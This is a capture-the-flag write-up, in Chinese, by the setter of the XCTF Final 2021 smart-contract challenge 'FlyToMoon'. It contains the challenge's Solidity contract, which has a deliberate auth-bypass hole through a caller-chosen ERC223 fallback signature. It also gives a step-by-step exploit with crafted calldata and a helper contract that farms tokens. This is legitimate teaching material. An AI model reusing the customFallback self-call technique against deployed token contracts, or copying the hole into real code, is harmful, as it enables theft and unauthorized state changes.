XCTF FINAL 2021 FlyToMoon

前言

• XCTF FINAL 二次出题，清晰记得 19 年那次出题的痛，被各位师傅硬是玩成了 AWD 模式，惨惨
• 回想出题模式由最开始的共享地址 -> 采取随机数部署不同的地址 -> geth + POA 禁用部分 API ，让选手有更公平的做题体验，防止“抄作业”，也算比较圆满了
• 本次题目也比较水，借鉴 balsn-Election 的 ABI Encoding 考点，随便写写

Source

pragma solidity =0.6.12;
pragma experimental ABIEncoderV2;

interface IERC223 {
    function name() external view returns (string memory);
    function symbol() external view returns (string memory);
    function decimals() external view returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address account) external view returns (uint);
    function transfer(address to, uint value) external returns (bool);
    function transfer(address to, uint value, bytes memory data) external returns (bool);
    function transfer(address to, uint value, bytes memory data, string memory customFallback) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint value, bytes data);
}

contract ERC223 is IERC223 {
    string public override name;
    string public override symbol;
    uint8 public override decimals;
    uint public override totalSupply;
    mapping (address => uint) private _balances;
    string private constant _tokenFallback = "tokenFallback(address,uint256,bytes)";

    constructor (string memory _name, string memory _symbol) public {
        name = _name;
        symbol = _symbol;
        decimals = 18;
    }

    function balanceOf(address account) public view override returns (uint) {
        return _balances[account];
    }

    function transfer(address to, uint value) public override returns (bool) {
        return _transfer(msg.sender, to, value, "", _tokenFallback);
    }

    function transfer(address to, uint value, bytes memory data) public override returns (bool) {
        return _transfer(msg.sender, to, value, data, _tokenFallback);
    }

    function transfer(address to, uint value, bytes memory data, string memory customFallback) public override returns (bool) {
        return _transfer(msg.sender, to, value, data, customFallback);
    }

    function _transfer(address from, address to, uint value, bytes memory data, string memory customFallback) internal returns (bool) {
        require(from != address(0), "ERC223: transfer from the zero address");
        require(to != address(0), "ERC223: transfer to the zero address");
        require(_balances[from] >= value, "ERC223: transfer amount exceeds balance");
        _balances[from] -= value;
        _balances[to] += value;

        if (_isContract(to)) {
            (bool success,) = to.call{value: 0}(
                abi.encodeWithSignature(customFallback, msg.sender, value, data)
            );
            assert(success);
        }
        emit Transfer(msg.sender, to, value, data);
        return true;
    }

    function _mint(address to, uint value) internal {
        require(to != address(0), "ERC223: mint to the zero address");
        totalSupply += value;
        _balances[to] += value;
        emit Transfer(address(0), to, value, "");
    }

    function _isContract(address addr) internal view returns (bool) {
        uint length;
        assembly {
            length := extcodesize(addr)
        }
        return (length > 0);
    }
}

contract FlyToMoon is ERC223 {
    struct Person {
        string name;
        uint age;
        string introduction;
    }
    
    address public owner;
    
    bytes32[] Hashes;
    
    uint public stage;
    bool private flag1;
    bool private flag2;
    bool private flag3;
    bool private flag4;
    string public solved = "begin";
    
    constructor() public ERC223("FlyToMoon", "FTM") {
        owner = msg.sender;
    }
    
    modifier auth {
        require(msg.sender == address(this) || msg.sender == owner, "FlyToMoon: not authorized");
        _;
    }
    
    function game1(address _person, Person memory person, bool flag) public {
        require(stage==0 && flag);
        require(person.age > 20, "BabyEncode: only your age > 20 can paly this game");
        flag1 = true;
        stage = 1;
    }
    
    function game2(uint from, uint idx, uint password, uint len, Person[] memory persons) public auth {
        require(stage == 1);
        require(Hashes[idx] == keccak256(abi.encode(persons)), "FlyToMoon: hash incorrect");
        require(Hashes[idx+1] == keccak256(abi.encode(password)), "FlyToMoon: password incorrect");
        require(Hashes[idx+2] == keccak256(abi.encode(len)), "FlyToMoon: len incorrect");
        require(_stringCompare(persons[0].name, "btc") && _stringCompare(persons[1].introduction, "fly to moon"));
        flag2 = true;
    }
    
    function game3(uint from, uint _len) public auth {
        uint len;
        require(stage == 2  && flag2);
        assembly {
            len := sload(6)
        }
        require(len==_len);
        flag3 = true;
        stage = 3;
    }
    
    function game4(uint _time, Person memory person, uint flag) public auth {
        require(stage == 3);
        require(_stringCompare(person.name, "pikapika"));
        flag4 = true;
    }
    
    function sethash(bytes32 _hash) public {
        Hashes.push(_hash);
    }

    function isSolved() public {
        uint tmp;
        
        assembly {
            tmp := sload(8)
        }
        
        if (keccak256(abi.encodePacked(tmp)) == 0xffc411432425ed5cecf9384ab99646c1825e1fe40ce46b953350782d81a6ecc1) {
            if (balanceOf(address(this)) == 10) {
                solved = "Fly to Moon";
            }
        } else {
            solved = "Tian Tai Jian";
        }
    }
    
    function giveMeMoney() public {
        require(balanceOf(msg.sender) == 0, "FlyToMoon: you're too greedy");
        _mint(msg.sender, 1);
    }
    
    function _setStage(uint _stage, uint idx, string memory _command) public auth {
        require(_stringCompare(_command, "Let me set stage, please!!!!!!!!"));
        stage = _stage & 0xff;
        for(uint i=0; i<=idx; i++) {
            Hashes.push(0);
        }
    }
    
    function _stringCompare(string memory a, string memory b) internal pure returns (bool) {
        return keccak256(abi.encodePacked(a)) == keccak256(abi.encodePacked(b));
    }
}

Analyse

• 具体分析过程及原因就不写了，不太懂的小伙伴可以翻一番前面的博客，自行理解的过程会比简单看一篇 WP 帮助更大 ～～其实是我偷懒 :D～～
• 目标成功调用 game2 和 game3

1. 生成末尾为 01 的账户
   • 使用 transfer 调用 setstage(1)

to:    题目地址
value: 0
data:  0x4c6574206d65207365742073746167652c20706c656173652121212121212121
cus:   "_setStage(uint256,uint256,string)"

2. sethash(0x230fd66aacfe66f0e897312a7aefa3bcd51406d9831619983aca15c7f601ba77)
   • 下述脚本可计算 [[“btc”, 100, “test1”], [“test2”, 200, “fly to moon”]] 的编码

pragma solidity =0.6.12;
pragma experimental ABIEncoderV2;

contract Vault {
    struct Person {
        string name;
        uint age;
        string introduction;
    }
    
    function ballotEncode(Person[] memory persons) pure public returns (bytes32){
        return keccak256(abi.encode(persons));
    }
}

3. sethash(0x41c7ae758795765c6664a5d39bf63841c71ff191e9189522bad8ebff5d4eca98)

keccak256(abi.encode(0x60))

4. sethash(0xd971d7a75d56a87205c10f76d77a1984a94b99f0ba39ec86813b6d42a571a285)

keccak256(abi.encode(0x240))

5. 使用末尾为 01 的账户调用 giveMeMoney()

6. 使用 transfer 调用 game2(from, 1, 0x60, 0x240, [[“btc”, 100, “test1”], [“test2”, 200, “fly to moon”]])

to:    题目地址
value: 1
data:  0x00000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000006400000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000000000000000000000000003627463000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000057465737431000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000c800000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000057465737432000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b666c7920746f206d6f6f6e000000000000000000000000000000000000000000
cus:   "game2(uint256,uint256,uint256,uint256,(string,uint256,string)[])"

7. 生成末尾为 02 的账户
   • 使用 transfer 调用 setstage(2)

to:    题目地址
value: 0
data:  0x4c6574206d65207365742073746167652c20706c656173652121212121212121
cus:   "_setStage(uint256,uint256,string)"

8. 使用下述脚本，times = 0x9, 使 02 账户金额为 0x9

contract son {
    EncodeGame target = EncodeGame(题目地址);
    
    function getmoney(uint times) public {
        for (uint i=0; i<times; i++) {
            target.giveMeMoney();
            target.transfer(0x02账户, 1, "", "");
        }
    }
}

9. 使用 transfer 调用 game3(from, 5)

to:    题目地址
value: 5
data:  0x01
cus:   "game3(uint256,uint256)"

10. 使用 transfer 调用 setstage(2)

to:    题目地址
value: 4
data:  0x4c6574206d65207365742073746167652c20706c656173652121212121212121
cus:   "_setStage(uint256,uint256,string)"

11. 调用 isSolved